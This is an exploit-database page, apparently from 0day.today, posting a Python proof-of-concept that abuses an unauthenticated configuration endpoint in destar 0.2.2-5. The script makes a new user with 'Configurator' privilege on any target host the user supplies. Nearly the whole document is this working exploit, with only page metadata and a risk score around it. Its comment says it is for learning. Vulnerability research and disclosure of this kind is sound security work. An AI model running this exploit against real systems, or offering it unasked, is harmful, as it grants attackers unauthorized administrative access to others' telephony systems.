destar 0.2.2-5 Arbitrary Add New User Exploit

🗓️ 23 Mar 2008 00:00:00Reported by nonrootType

zdt🔗 0day.today👁 16 Views

destar 0.2.2-5 Arbitrary Add New User Exploit tested on Linux Debian

=============================================
destar 0.2.2-5 Arbitrary Add New User Exploit
=============================================



#
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and  exploit coded by a non root user
#
# http://nonroot.blogspot.com
#
# Enero 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $python ./exploit_code.py
#
# required: urllib,urllib2 sys and re
#
import urllib,urllib2
import sys,re
print "Target host: i.e: http://127.0.0.1:8080/"
host=raw_input("Target host ( include http and /): ")
#info for the new user
#
user='mama'
password='mama'
source_ip='127.0.0.9'
phone=''
level='Configurator'
language='en'
#
#
req = urllib2.Request(host)
adduser = urllib.urlencode({'name': user, 'secret': password, 'pc' : source_ip, 'submit' : "Submit", 'phone' : phone, 'level' : level, 'language' : language})
req.add_header('X_FORWARDED_FOR','')
req = urllib2.Request(host+"config/add/CfgOptUser")
r = urllib2.urlopen(req,adduser)
data=r.read()
lookup=re.compile("There were errors").search
match=lookup(data)
if not match:
	print "Ok, now go and test your user at:",host
else:
	print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
	sys.exit(2)

sys.exit(0)



#  0day.today [2018-01-09]  #

23 Mar 2008 00:00Current

7.1High risk

Vulners AI Score7.1